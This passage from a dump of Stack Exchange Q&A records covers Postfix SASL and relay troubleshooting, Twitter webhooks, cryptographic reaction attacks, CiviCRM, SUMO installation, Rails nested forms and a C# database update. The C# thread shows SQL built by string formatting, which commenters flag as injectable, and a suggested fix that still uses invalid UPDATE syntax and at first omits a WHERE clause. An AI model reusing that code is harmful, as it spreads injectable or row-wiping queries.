verify\nflush unix n - y 1000? 0 flush\nproxymap unix - - n - - proxymap\nproxywrite unix - - n - 1 proxymap\nsmtp unix - - y - - smtp\nrelay unix - - y - - smtp\n# -o smtp_helo_timeout=5 -o smtp_connect_timeout=5\nshowq unix n - y - - showq\nerror unix - - y - - error\nretry unix - - y - - error\ndiscard unix - - y - - discard\nlocal unix - n n - - local\nvirtual unix - n n - - virtual\nlmtp unix - - y - - lmtp\nanvil unix - - y - 1 anvil\nscache unix - - y - 1 scache\n#\n# ====================================================================\n# Interfaces to non-Postfix software. Be sure to examine the manual\n# pages of the non-Postfix software to find out what options it wants.\n#\n# Many of the following services use the Postfix pipe(8) delivery\n# agent. 
See the pipe(8) man page for information about ${recipient}\n# and other message envelope options.\n# ====================================================================\n#\n# maildrop. See the Postfix MAILDROP_README file for details.\n# Also specify in main.cf: maildrop_destination_recipient_limit=1\n#\nmaildrop unix - n n - - pipe\n flags=DRhu user=vmail argv=\/usr\/bin\/maildrop -d ${recipient}\n#\n# ====================================================================\n#\n# Recent Cyrus versions can use the existing \"lmtp\" master.cf entry.\n#\n# Specify in cyrus.conf:\n# lmtp cmd=\"lmtpd -a\" listen=\"localhost:lmtp\" proto=tcp4\n#\n# Specify in main.cf one or more of the following:\n# mailbox_transport = lmtp:inet:localhost\n# virtual_transport = lmtp:inet:localhost\n#\n# ====================================================================\n#\n# Cyrus 2.1.5 (Amos Gouaux)\n# Also specify in main.cf: cyrus_destination_recipient_limit=1\n#\n#cyrus unix - n n - - pipe\n# user=cyrus argv=\/cyrus\/bin\/deliver -e -r ${sender} -m ${extension} ${user}\n#\n# ====================================================================\n# Old example of delivery via Cyrus.\n#\n#old-cyrus unix - n n - - pipe\n# flags=R user=cyrus argv=\/cyrus\/bin\/deliver -e -m ${extension} ${user}\n#\n# ====================================================================\n#\n# See the Postfix UUCP_README file for configuration details.\n#\nuucp unix - n n - - pipe\n flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)\n#\n# Other external delivery methods.\n#\nifmail unix - n n - - pipe\n flags=F user=ftn argv=\/usr\/lib\/ifmail\/ifmail -r $nexthop ($recipient)\nbsmtp unix - n n - - pipe\n flags=Fq. user=bsmtp argv=\/usr\/lib\/bsmtp\/bsmtp -t$nexthop -f$sender $recipient\nscalemail-backend unix - n n - 2 pipe\n flags=R user=scalemail argv=\/usr\/lib\/scalemail\/bin\/scalemail-store ${nexthop} ${user} ${extension}\nmailman unix - n n - - pipe\n flags=FR user=list argv=\/usr\/lib\/mailman\/bin\/postfix-to-mailman.py\n ${nexthop} ${user}\n<\/code>\n\/etc\/main.cf\n<code># See \/usr\/share\/postfix\/main.cf.dist for a commented, more complete version\n\n# Debian specific: Specifying a file name will cause the first\n# line of that file to be used as the name. 
The Debian default\n# is \/etc\/mailname.\n#myorigin = \/etc\/mailname\n\nsmtpd_banner = $myhostname ESMTP $mail_name (Ubuntu)\nbiff = no\n\n# appending .domain is the MUA's job.\nappend_dot_mydomain = no\n\n# Uncomment the next line to generate \"delayed mail\" warnings\n#delay_warning_time = 4h\n\nreadme_directory = no\nsmtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination\nmyhostname = server.sample.com\nalias_maps = hash:\/etc\/aliases\nalias_database = hash:\/etc\/aliases\nmyorigin = \/etc\/mailname\nmydestination = $myhostname, sample.com, server.sample.com, localhost.sample.com, localhost\nrelayhost = \nmynetworks = 127.0.0.0\/8 [::ffff:127.0.0.0]\/104 [::1]\/128\nmailbox_size_limit = 0\nrecipient_delimiter = +\ninet_interfaces = all\ninet_protocols = all\nhome_mailbox = Maildir\/\nvirtual_alias_maps = hash:\/etc\/postfix\/virtual\n\n# SASL SUPPORT FOR CLIENTS\n#\n# The following options set parameters needed by Postfix to enable\n# Cyrus-SASL support for authentication of mail clients.\nsmtpd_sasl_path = smtpd\nsmtpd_sasl_auth_enable = yes\nsmtpd_sasl_security_options = noanonymous\nsmtpd_sasl_local_domain = $myhostname\nbroken_sasl_auth_clients = yes\nsmtpd_recipient_restrictions =\n permit_sasl_authenticated,\n permit_mynetworks,\n check_relay_domains\n\ncompatibility_level = 2\n<\/code>\n\/etc\/postfix\/sasl\/smtpd.conf\n<code>pwcheck_method: saslauthd\nmech_list: plain login\n<\/code>\n\/etc\/s-nail.rc\n<code>#@ s-nail.rc\n#@ Configuration file for S-nail(1) v14.8.6\n# S-nail(1): v14.8.6 \/ 2015-12-28\n\n## The standard POSIX 2008\/Cor 1-2013 mandates the following initial settings:\n# (Keep in sync: .\/main.c:_startup(), .\/nail.rc, .\/nail.1:\"Initial settings\"!)\n# [a] noallnet, noappend, asksub, noaskbcc, noaskcc, noautoprint,\n# [b-e] nobang, nocmd, nocrt, nodebug, nodot, escape=\"~\",\n# [f-i] noflipr, nofolder, header, nohold, noignore, noignoreeof,\n# [j-o] nokeep, nokeepsave, nometoo, nooutfolder,\n# [p-r] nopage, prompt=\"? 
\", noquiet, norecord,\n# [s] save, nosendwait, noshowto, nosign, noSign,\n# [t-z] toplines=\"5\"\n# Notes:\n# - no*onehop* doesn't exist in this implementation.\n# (To pass options through to an MTA, either add them after a \"--\" separator\n# on the command line or by setting the *sendmail-arguments* variable.)\n# - *prompt* is \"\\\\& \" by default, which will act POSIX-compliant\n# unless the user would set *bsdcompat*\n\n## The remaining content adjusts the standard-imposed default settings.\n# Note that some of the following flags are specific to S-nail(1) and may thus\n# not work with other Mail(1) \/ mailx(1) programs.\n# Entries are marked [OPTION] if their availability is compile-time dependent\n\n## Variables\n\n# If threaded mode is activated, automatically collapse thread\nset autocollapse\n\n# Enter threaded mode automatically\n#set autosort=thread\n\n# Append rather than prepend when writing to mbox automatically.\n# This has no effect unless *hold* is unset (it is set below)\nset append\n\n# Ask for a message subject.\nset ask\n\n# *bsdannounce* prints a header summary on folder change and thus complements\n# *header* on a per-folder basis (it is meaningless unless *header* is set)\nset bsdannounce\n\n# Uncomment this in order to get coloured output in $PAGER.\n# (Coloured output is only used if $TERM is either found in *colour-terms*\n# or includes the string \"color\")\n#set colour-pager\n\n# Assume a CRT-like terminal and invoke a $PAGER\nset crt\n\n# Define date display in header summary\n#set datefield=\"%R %m-%d\" datefield-markout-older=\" %g-%m-%d\"\n\n# When composing messages a line consisting of `.' finalizes a message\nset dot\n\n# Immediately start $EDITOR (or $VISUAL) when composing a message\n#set editalong\n\n# Startup into interactive mode even if the (given) mailbox is empty\n#set emptystart\n\n# When replying to or forwarding a message the comment and name parts of email\n# addresses are removed unless this variable is set.\n#set fullnames\n\n# [OPTION] Add more entries to the history as is done by default\nset history-gabby\n\n# Do not forward to mbox by default since this is likely to be\n# irritating for most users today; also see *keepsave*\nset hold\n\n# Quote the original message in replies by \"> \" as usual on the Internet\nset indentprefix=\"> \"\n\n# Mark messages that have been answered\nset markanswered\n\n# Try to circumvent false or missing MIME Content-Type descriptions\n# (Can be set to values for extended behaviour, please see the manual.)\nset mime-counter-evidence\n\n# Control loading of mime.types(5) file: the value may be a combination of the\n# letters \"s\" and \"u\": if \"u\" is seen ~\/.mime.types will be loaded if possible;\n# \"s\" adds \/etc\/mime.types, if available; setting this without any value uses\n# only a set of builtin mimetypes; the default behaviour equals \"us\".\n# An extended syntax that allows loading of other, specified files is available\n# if the value contains an equal sign \"=\", see the manual for more\n#set mimetypes-load-control\n\n# Do not remove empty mail folders.\n# This may be relevant for privacy since other users could otherwise create\n# them with different permissions\nset keep\n\n# Do not move `save'd or `write'n message to mbox by default since this is\n# likely to be irritating for most users today; also see *hold*\nset keepsave\n\n# When writing mailbox files we strip Content-Length: and Lines: header fields\n# from edited \/ changed messages, because S-nail doesn't deal with these\n# 
(non-standard) fields -- and since other MUAs may rely on their content, if\n# present, it seems more useful to strip them than to keep them, now that they\n# became invalid; set this to include them nonetheless\n#set keep-content-length\n\n# A nice prompt for ISO 6429\/ECMA-48 terminals\n#set prompt=\"\\033[31m?\\?[\\$ \\@]\\& \\033[0m\"\n\n# Automatically quote the text of the message that is responded to\nset quote\n\n# On group replies, specify only the sender of the original mail in To: and\n# mention it's other recipients in the secondary Cc: instead of placing them\n# all together in To:\nset recipients-in-cc\n\n# When responding to a message, try to answer in the same character set\n#set reply-in-same-charset\n\n# [OPTION] Outgoing messages are sent in UTF-8 if possible, otherwise LATIN1.\n# Note: it is highly advisable to read the section \"Character sets\" of the\n# manual in order to understand all the possibilities that exist to fine-tune\n# charset usage (variables also of interest: *ttycharset*, *charset-8bit*,\n# *sendcharsets-else-ttycharset*; and of course we inherit the $LC_CTYPE \/\n# $LC_ALL \/ $LANG environment variables and react upon them)\nset sendcharsets=utf-8,iso-8859-1\n\n# When sending a message wait until the MTA (including the builtin SMTP one)\n# exits before accepting further commands. Only with this variable set errors\n# reported by the MTA will be recognizable!\n#set sendwait\n\n# Display real sender names in header summaries instead of only addresses\nset showname\n\n# Show recipients of messages sent by the user himself in header summaries\nset showto\n\n## Commands\n\n# Only include these selected header fields when forwarding messages\nfwdretain subject date from to\n\n# Only include the selected header fields when printing messages\nretain date from to cc subject message-id mail-followup-to reply-to\n\n## Some pipe-TYPE\/SUBTYPE entries\n\n# HTML as text, inline display via lynx(1)\n#if $features !@ HTML-FILTER\n# set pipe-text\/html=\"lynx -stdin -dump -force_html\"\n#endif\n\n# PDF display, asynchronous display via xpdf(1)\n#set pipe-application\/pdf=\"@&set -C;\\\n# : > \\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\";\\\n# trap \\\"rm -f \\\\\\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\\\\\"\\\" \\\n# EXIT INT QUIT PIPE TERM;\\\n# set +C;\\\n# cat > \\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\";\\\n# xpdf \\\"${TMPDIR}\/${NAIL_FILENAME_GENERATED}\\\"\"\n\n# s-it-mode\n\n#Added according to docs found in internet.\nset emptystart\nset folder=Maildir\nset record=+sent\n<\/code>\n\/etc\/default\/saslauthd\n<code>#\n# Settings for saslauthd daemon\n# Please read \/usr\/share\/doc\/sasl2-bin\/README.Debian for details.\n#\n\n# Should saslauthd run automatically on startup? (default: no)\nSTART=yes\n\n# Description of this saslauthd instance. Recommended.\n# (suggestion: SASL Authentication Daemon)\nDESC=\"SASL Authentication Daemon\"\n\n# Short name of this saslauthd instance. Strongly recommended.\n# (suggestion: saslauthd)\nNAME=\"saslauthd\"\n\n# Which authentication mechanisms should saslauthd use? (default: pam)\n#\n# Available options in this Debian package:\n# getpwent -- use the getpwent() library function\n# kerberos5 -- use Kerberos 5\n# pam -- use PAM\n# rimap -- use a remote IMAP server\n# shadow -- use the local shadow password file\n# sasldb -- use the local sasldb database file\n# ldap -- use LDAP (configuration is in \/etc\/saslauthd.conf)\n#\n# Only one option may be used at a time. 
See the saslauthd man page\n# for more information.\n#\n# Example: MECHANISMS=\"pam\"\nMECHANISMS=\"shadow\"\n\n# Additional options for this mechanism. (default: none)\n# See the saslauthd man page for information about mech-specific options.\nMECH_OPTIONS=\"\"\n\n# How many saslauthd processes should we run? (default: 5)\n# A value of 0 will fork a new process for each connection.\nTHREADS=5\n\n# Other options (default: -c -m \/var\/run\/saslauthd)\n# Note: You MUST specify the -m option or saslauthd won't run!\n#\n# WARNING: DO NOT SPECIFY THE -d OPTION.\n# The -d option will cause saslauthd to run in the foreground instead of as\n# a daemon. This will PREVENT YOUR SYSTEM FROM BOOTING PROPERLY. If you wish\n# to run saslauthd in debug mode, please run it by hand to be safe.\n#\n# See \/usr\/share\/doc\/sasl2-bin\/README.Debian for Debian-specific information.\n# See the saslauthd man page and the output of 'saslauthd -h' for general\n# information about these options.\n#\n# Example for chroot Postfix users: \"-c -m \/var\/spool\/postfix\/var\/run\/saslauthd\"\n# Example for non-chroot Postfix users: \"-c -m \/var\/run\/saslauthd\"\n#\n# To know if your Postfix is running chroot, check \/etc\/postfix\/master.cf.\n# If it has the line \"smtp inet n - y - - smtpd\" or \"smtp inet n - - - - smtpd\"\n# then your Postfix is running in a chroot.\n# If it has the line \"smtp inet n - n - - smtpd\" then your Postfix is NOT\n# running in a chroot.\nOPTIONS=\"-c -m \/var\/run\/saslauthd\"\n<\/code>\nI would like to achieve two things:\n1. Make the \"auth login\" work correctly.\n2. Make both user be able to send email to out side, like to my gmail account.\nThanks for the help in advance.\nComment: What did you mean by \"App Password\"? I suppose you mean that I need to give google server address, my account name and password before I could send out mail using my Gmail account? This is not what I'm looking for and I know this already. The log I've shown there was created when I tried to send an email to my firstname.lastname@example.com email address from the user \"yida\". I'm not trying to send out email using my Gmail account. Hope this clarify the situation. Thanks for your comment.\nComment: I'm using the postfix software I've installed in this server.sample.com computer as my SMTP carrier. In other words, I'm trying to be my own SMTP provider.\nComment: Run 2 terminal windows. 1 is running `tail -f \/var\/log\/mail.log` and in the other try testing your outgoing mail. Watch the log output. Chances are you are timing out on some connection further up the line due to no `relayhost = ` being configured in your mail.cf file.\nComment: OK. The reasons for the time out has been identified: first, I enabled IPV6 in my LAN but my ISP does not provide IPV6 service, so I could not connect to the IPV6 address of gmail SMTP server. Second, my ISP disabled the port 25 traffic, both inbound and outbound.\nI changed the main.cf to say \"inet_protocols = ipv4\" and fixed the first problem. But for the second problem, I'm speechless.\nComment: Could you please tell me how to setup the \"relayhost = \" option? And I'm also wondering if there is anything I could do to use SSL port instead of 25 while trying to relay my email.\nComment: If you don't want your email showing from `@gmail.com` which is free to setup, then you will need to create a domain through a service that will allow you to have your own `@yourdomain.com` email address. 
Something like the Google Domains https:\/\/domains.google\/#\/ This will allow you to configure your email server to use their relayhosts on port 587. I have not found anyway to get around something like this due to the blocking of spam on most services now. It used to be that you could create your own without any problems, but too many people abused it.\nComment: Thank you very much for sharing the information with me. I'll investigate and try a little more about it before I should decide to give up.\nComment: Just one more comment here. I've set up my postfix to relay to a host we rent from a hosting company and having smtp service on port 587. In this way, I was able to keep my own domain name in the \"from\" address. Thank you very much for your help. I would not have been able to solve the problem without you.\nComment: Nice! Glad that you got it working! =)\nAnswer: <code>postfix\/smtp[3386]: connect to gmail-smtp-in.l.google.com[2607:f8b0:4001:c11::1a]:25: Network is unreachable\n<\/code>\nThis is a hint that IPv6 is attempted, but not available. It looks like your computer believes it has IPv6-connectivity, while it in reality does not have it. You should probably try to disable IPv6 completely:\nAdd the following lines to <code>\/etc\/sysctl.conf<\/code>:\n<code>net.ipv6.conf.all.disable_ipv6 = 1\nnet.ipv6.conf.default.disable_ipv6 = 1\n<\/code>\nand reboot. This will disable IPv6, forcing you to use IPv4. Then try sending the e-mail again.\nFurthermore, postfix will accept mail without authentication, but if the destination is not one of the domains it is configured for, it will reject it, as it does not allow relaying e-mail in your configuration. This is important! An open relay will instantly be turned into a spam source...\nThis is configured with the line\n<code>smtpd_relay_restrictions = permit_mynetworks permit_sasl_authenticated defer_unauth_destination\n<\/code>\nRegarding the authentication failure, this is probably because the login method <code>auth login<\/code> is not a valid sasl authentication mechanism for your configuration. You're probably looking for <code>auth plain<\/code>. Try login from a e-mail client like thunderbird, which supports most authentication protocols.\nComment: Good point and good observation. Thank you very much for sorting that out for me.\nI've changed the main.cf file to say \"inet_protocols = ipv4\" and postfix seem to use ivp4 to search for gmail server now.\nBut still, it gives me problem. Now the email sending log reads\n\"connect to gmail-smtp-in.l.google.com[126.96.36.199]:25: Connection timed out\"\nComment: And the plain authorization failed, as well. In the mail.log file, it complains \"cannot connect to saslauthd server: No such file or directory\". But when I tried to run the command \"saslauthd -a shadow\" again, I got the information as \"Another instance of saslauthd is currently running\".\nCould you please help me further in this? Thanks.\nComment: The fact that it times out points in the direction of @Terrance comments, and you will probably need a relay host on a port different from 25 to send e-mail, or talk with your ISP to verify that port 25 is open for outgoing connections. Regarding your question about saslauth, edit your question to include the Cyrus SASL configuration. It should include the path to a listener at `\/var\/spool\/postfix\/smtpd`\nComment: OK, as a matter of fact, my ISP blocks port 25 traffics, both inbound and outbound. 
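(As a hedged sketch rather than the exact settings used in this setup: the usual workaround when port 25 is blocked is to hand outgoing mail to an authenticated relayhost on the submission port, e.g. in main.cf\n<code>relayhost = [relay.example.com]:587\nsmtp_sasl_auth_enable = yes\nsmtp_sasl_password_maps = hash:\/etc\/postfix\/sasl_passwd\nsmtp_sasl_security_options = noanonymous\nsmtp_tls_security_level = encrypt\n<\/code>\nwhere relay.example.com is only a placeholder for whichever provider relays for you, with its credentials kept in \/etc\/postfix\/sasl_passwd and hashed with postmap. This matches what the closing comments describe doing on port 587.)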
That's why I still could not send email to my gmail account.\nI've posted the configuration file for Cyrus SASL, that's the saslauthd file in the post. The path it uses is \"\/var\/run\/saslauthd\", so I've updated the smtpd.conf file using the same path. But still the same error when doing the auth plain and auth login.\nComment: I also tried to connect using opera mail (another MUA under windows) but failed in authentication while trying to send mail out. Same error message displayed as \"authentication failed: generic failure\".\nComment: Is there a way that I can set up POSTFIX so that it will try to relay emails using another port rather than 25? Say using the port 465?\nComment: Can you try changing the sasl path in saslauthd file to \/var\/spool\/postfix\/smtpd?\nComment: Wow, that's where the problem lies. I opened the file \/etc\/default\/saslauthd and found out that the last line should be set as 'OPTIONS=\"-c -m \/var\/spool\/postfix\/var\/run\/saslauthd\"' since my Postfix was running on chroot mode. I changed this line, put the path in the smtpd.conf file and restarted saslauthd and postfix. Everything then works fine. Thank you very much.\nComment: Since the problem of Sasl authentication has been solved, and it was my ISP who was the reason why I could not send email out, I'm considering this question is solved. Thank you very much.\n","meta":{"source":"askubuntu","title":"Postfix authentication failure, can't send email out","dup_signals":{}},"subset":"stackexchange"} +{"text":"Where to add payload URL for Twitter webhook?\n\nQuestion: Github has a webhooks tab in the settings of a repository and it has a submission for a payload URL. I looked all over the developer site for Twitter but I can't really find anything. I'm still really new to how all of this works.\nAnswer: For Twitter, you need to add your webhook URLs programmatically via the API. The documentation is here. You'll need to send an authenticated HTTP POST request to <code>https:\/\/api.twitter.com\/1.1\/account_activity\/all\/[YOUR_ENV_NAME]\/webhooks.json<\/code> with the URL specified in the URL parameter.\nIf you would like something that does more of the work for you - although this is in JavaScript, not Python - you can take a look at this tutorial using autohook.\n","meta":{"source":"stackoverflow","title":"Where to add payload URL for Twitter webhook?","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is reaction attack?\n\nQuestion: In the paper of \"Reaction Attacks against Several Public-Key Cryptosystems\" CiteSeerX link, reaction attack is defined informally as \"Obtaining information about the private key or plaintext by watching the reaction of someone decrypting a given ciphertext with the private key.\"\nIs reaction attack explicitly defined in literature? What is the difference between fault attack and reaction attack -as defined here- ?\nComment: Reading their abstract, I'm certain it's an umbrella term for side-channel attack (and you've tagged as such).\nComment: Paper is [here](https:\/\/cypherpunks.ca\/~iang\/pubs\/paper-reaction-attacks.pdf) it is well-written about it on the second page. 
Yes, it is a side-channel but not a fault attack that targets the hardware, this is a soft attack that you get only information from the reaction like the CBC-padding oracles or the tag mismatch in GCM...\nComment: Are decryption failure attacks in these class?\nAnswer: \"Reaction attack\" seems to be just a custom name used in a few papers, meaning the reaction of the decryption oracle on maliciously crafted\/modified ciphertexts. These are just CCA attacks, not side-channel attacks a priori, but in some cases side channel information such as timing can be used.\nThese attacks are based exploiting the decryption oracle. Note that many CPA-secure schemes are not CCA-secure (e.g. CBC encryption of a block cipher is vulnerable to the padding oracle attack), however there are ways to convert them in CCA-secure schemes (e.g. adding a MAC for symmetric encryption, or the Fujisaki-Okamoto (FO) transformation for asymmetric schemes).\nComment: An example of \"reaction\" would be an error code that differs according to what went wrong in a decryption operation. I would rather take a position about the most natural endianness than about if that varying error code qualifies as a side-channel.\n","meta":{"source":"crypto.stackexchange","title":"What is reaction attack?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Canceling Recurring Contributions Without PayPal\n\nQuestion: I just noticed that our receipts for recurring contributions say \"You can cancel this recurring contribution by visiting this page\" with a link to PayPal's homepage and \"You can update your amount by visiting this page\" again, with a link to PayPal's homepage. \nAlmost all of our contributors are using credit cards, not PayPal. How can I set this so our contributors can cancel a recurring contributions or increase the amount, when they are not using PayPal? \nThank you\nCiviCRM 4.7.22 on WordPress 4.8.22\nComment: Do you use a different Payment Processor than Paypal for CCs? Go to Administer > System Settings > Payment Processors to see who you use for CCs.\nComment: That is not the issue. The issue is if someone contributions with a CC and chooses to have the contribution recurring every month, how would they cancel that?\nComment: I think it is related. I believe that link is supplied via your payment processor extension. I was asking the question because you imply that that you have a different processor for CCs than you do for ACHs. But I am guessing you use PayPal for both. But either way, look where I pointed to see who is your CC Payment Processor and then I think you can track down where the link is in the extension.\nAnswer: Have a look at this Q&A. I think it is the answer you are looking for\nWrong return URLs in PayPal Standard\n","meta":{"source":"civicrm.stackexchange","title":"Canceling Recurring Contributions Without PayPal","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error when trying to go to the folder by command line after instaling sumo\n\nQuestion: <code>$ sudo apt-get install sumo sumo-tools sumo-doc\n[sudo] password for my: \nReading package lists... Done\nBuilding dependency tree \nReading state information... 
Done\nsumo is already the newest version (0.27.1+dfsg1-1).\nsumo-doc is already the newest version (0.27.1+dfsg1-1).\nsumo-tools is already the newest version (0.27.1+dfsg1-1).\n0 upgraded, 0 newly installed, 0 to remove and 190 not upgraded.\nmy@my-HP-15-Notebook-PC:~$ cd'\/home\/my\/Downloads\/sumo-0.30.0' \nbash: cd\/home\/my\/Downloads\/sumo-0.30.0: No such file or directory\n<\/code>\nComment: Please run `ls -a` and paste the output\nAnswer: APT does not download to your <code>Downloads<\/code> directory. It stores its cached files in <code>\/var\/cache\/apt<\/code> but you mostly do not need to access these files directly.\nThere is one more problem with your <code>cd<\/code> command: You are missing a space between the command and the path.\nHowever, you do not have to access <code>Downloads<\/code> folder to run <code>sumo<\/code>. Once you have installed the requested package <code>sumo<\/code> using APT (you have installed it already according to <code>sumo is already the newest version<\/code>), you can simply run the commands <code>sumo<\/code>, <code>sumo-gui<\/code> etc. in your terminal.\n(My guesses of the command names are based on https:\/\/packages.ubuntu.com\/xenial\/amd64\/sumo\/filelist, have not installed <code>sumo<\/code> myself.)\nAnswer: You missed a space in the command:\n<code>cd'\/home\/my\/Downloads\/sumo-0.30.0'\n<\/code>\nChange to:\n<code>cd '\/home\/my\/Downloads\/sumo-0.30.0'\n<\/code>\n","meta":{"source":"askubuntu","title":"Error when trying to go to the folder by command line after instaling sumo","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rails Nested Model Form\n\nQuestion: At the moment I have three models:\n<code>Songs have many Setlists through Allocations\nSetlists have many Songs through Allocations\nAllocations belong to Setlists and belong to Songs\n<\/code>\nMy form at the moment looks like:\n<code> <%=f.label :date, \"Set a date\" %>\n <%=f.date_select :date%>\n\n <div>\n <%= render 'song' %> \n <\/div>\n\n <%=f.submit \"Create Setlist\", class: \"btn btn-large btn-primary\" %>\n<\/code>\nthe song partial given above is:\n<code><div id=\"songSelection\">\n<table class= \"table table-striped table-bordered\">\n <thead>\n <th>Title<\/th>\n <th>Artist<\/th>\n <th>Add to Set<\/th>\n <\/thead>\n <tbody>\n <% @songs.each do |song| %>\n <tr>\n <%= nested_form_for(@setlist.allocations.build(song_id: song.id)) do |builder| %>\n <td><%= song.title %><\/td>\n <td><%= song.artist %><\/td>\n <td>\n <%= builder.submit \"Add Song\", class: \"btn btn-small btn-primary\" %>\n <% end %>\n <\/td>\n <\/tr>\n <% end %>\n <\/tbody>\n<\/table>\n<\/div>\n<\/code>\nBasically I'm trying to assign songs to setlists through allocations. At the moment it states that the f in the songs partial isn't defined. If I get rid of it then the page renders fine but doesn't function properly (i.e. whenever I click the button to add a song it redirects it saves the changes to the setlist date but doesn't assign any new allocations). Any help would be much appreciated. I realize that I may have missed out information as I'm somewhat new to this so if any additional details are needed please ask.\nI've tried using the nested form gem by Ryan Bates but I couldn't get it working. 
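(For reference, a hedged and untested sketch of the gem-free route with the models above: put <code>accepts_nested_attributes_for :allocations<\/code> on Setlist,\n<code>class Setlist < ActiveRecord::Base\n has_many :allocations\n has_many :songs, through: :allocations\n accepts_nested_attributes_for :allocations\nend\n<\/code>\nand render one <code>form_for @setlist<\/code> whose song rows use <code><%= f.fields_for :allocations do |a| %> ... <% end %><\/code>, so each allocation's song_id arrives inside the setlist params instead of through a separate nested_form_for per row.)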
I think it's because it's not assigning a song id to the allocation when it goes to try and build it but not sure where\/how I'd put that in.\nAnswer: Try https:\/\/github.com\/ryanb\/nested_form\nComment: I've tried using this but I'm still having issues...Here's my code:\n\n `\n <% @songs.each do |song| %>\n \n <%= nested_form_for(@setlist.allocations.build(song_id: song.id)) do |builder| %>\n <%= song.title %>\n<%= song.artist %>\n<%= song.key %>\n\n <%= builder.submit \"Add Song\", class: \"btn btn-small btn-primary\" %>\n <% end %>\n \n\n <% end %>\n `\nComment: Whoops that didn't format at all! Will post it in the actual question\n","meta":{"source":"stackoverflow","title":"Rails Nested Model Form","dup_signals":{}},"subset":"stackexchange"} +{"text":"Update in C# using repository, new window and main window\n\nQuestion: This is my code used for updating a customer in c#, can someone help me correcting the code, so that it will work smoothly?\nThis is my repository code:\n<code>public static void KlantWijzigen(Klant klan)\n{\n string commandString = string.Format(\"UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) SET('{0}','{1}','{2}','{3}','{4}')\", klan.Adres, klan.Postcode, klan.Gemeente, klan.Email, klan.Telefoonnummer);\n\n OleDbConnection conn = new OleDbConnection(connectionString);\n OleDbCommand command = new OleDbCommand();\n OleDbDataAdapter adapter = new OleDbDataAdapter();\n\n conn.Open();\n\n \/\/commandstring toevoegen aan adapter\n command.Connection = conn;\n command.CommandText = commandString;\n adapter.UpdateCommand = command;\n\n \/\/command uitvoeren\n adapter.UpdateCommand.ExecuteNonQuery();\n\n \/\/databank connect\n conn.Close();\n}\n<\/code>\nMy new window code:\n<code>public partial class WindowKlantWijzig : Window\n{\n public WindowKlantWijzig()\n {\n InitializeComponent();\n }\n\n private void buttonSlaOp_Click(object sender, RoutedEventArgs e)\n {\n Klant upda = new Klant();\n\n upda.Naam = textBoxNieuweNaam.Text;\n upda.Adres = textBoxAdresNieuw.Text;\n upda.Postcode = Convert.ToInt32(textBoxPostcodeNieuw.Text);\n upda.Gemeente = textBoxGemeenteNieuw.Text;\n upda.Email = textBoxEmailNieuw.Text;\n upda.Telefoonnummer = textBoxTelefoonnummerNieuw.Text;\n\n KlantRepository.KlantWijzigen(upda);\n MessageBox.Show(\"De klant werd succesvol gewijzigd\");\n }\n}\n<\/code>\nAnd this is my main window code\n<code>private void buttonWijzigKlant_Click(object sender, RoutedEventArgs e)\n{\n if (comboBoxKlanten.SelectedIndex == -1)\n {\n MessageBox.Show(\"Selecteer de klant die je wil wijzigen\");\n }\n else\n {\n \/\/ TODO: gebruiker eerst om bevestiging vragen\n Klant klan = (Klant)comboBoxKlanten.SelectedItem;\n KlantRepository.KlantWijzigen(klan);\n MessageBox.Show(\"De klant werd succesvol gewijzigd\");\n\n \/\/combobox wordt vernieuwd\n comboBoxKlanten.ItemsSource = null;\n comboBoxKlanten.ItemsSource = KlantRepository.AlleKlanten();\n }\n}\n<\/code>\nComment: What are you trying to achieve here? What issue are you facing?\nComment: Also, `string commandString = string.Format(\"UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) SET('{0}','{1}','{2}','{3}','{4}')\", klan.Adres, klan.Postcode, klan.Gemeente, klan.Email, klan.Telefoonnummer);` is a SQL injection vulnerablility.\nComment: i'm trying to achieve that I can update records in the database. 
But the update must be carried out in a new window, so I can update and confirm the update in that new window.\nComment: Have you any suggestion how i can avoid the SQL injection? i'm just a newbie in programming, and this is my first programming project\nComment: You should use: `command.Parameters.Add(\"Adres\", OleDbType.VarChar).Value = klan.Adres;`\nComment: Jeroen: Can you please inform me where I should type that code, and maybe which code is unnecessary?\nComment: @JefD Added an example as answer. Veel succes ;-)\nAnswer: As response on the question from the comments, I would do it like this: (untested\/pseudo) So this is NOT the answer, but a response to prevent SQL-injections.\n<code>public static void KlantWijzigen(Klant klan)\n{\n string commandString = \"UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) SET(@Adres, @Postcode, @Gemeente, @Email, @Telefoonnummer)\";\n\n using(OleDbConnection conn = new OleDbConnection(connectionString))\n using(OleDbCommand command = new OleDbCommand())\n {\n conn.Open();\n\n \/\/commandstring toevoegen aan adapter\n command.Connection = conn;\n command.CommandText = commandString;\n\n \/\/ de velden zetten via de parameters, zodat SQL-injection niet werkt.\n command.Parameters.Add(\"Adres\", OleDbType.VarChar).Value = klan.Adres;\n command.Parameters.Add(\"Postcode\", OleDbType.VarChar).Value = klan.Postcode;\n command.Parameters.Add(\"Gemeente\", OleDbType.VarChar).Value = klan.Gemeente;\n command.Parameters.Add(\"Email\", OleDbType.VarChar).Value = klan.Email;\n command.Parameters.Add(\"Telefoonnummer\", OleDbType.VarChar).Value = klan.Telefoonnummer;\n\n OleDbDataAdapter adapter = new OleDbDataAdapter();\n\n adapter.UpdateCommand = command;\n\n \/\/command uitvoeren\n adapter.UpdateCommand.ExecuteNonQuery();\n }\n}\n<\/code>\nDon't forget... you're missing a <code>Where<\/code> clause.. so you are updating ALL records.\nYou might change (something like):\n<code> string commandString = @\"\n UPDATE tblKlanten (Adres, Postcode, Gemeente, Email, Telefoonnummer) \n SET(@Adres, @Postcode, @Gemeente, @Email, @Telefoonnummer) \n WHERE id = @Id\"; \/\/ <<--------------\n\n command.Parameters.Add(\"Id\", OleDbType.Integer).Value = klan.Id;\n<\/code>\nComment: Harteljik bedankt voor de duidelijke uitwerking, ik ga er vanavond na lestijd mee aan de slag. Bedankt!\nComment: Graag gedaan...vergeet niet de WHERE, anders wordt al je data aangepast...\n","meta":{"source":"stackoverflow","title":"Update in C# using repository, new window and 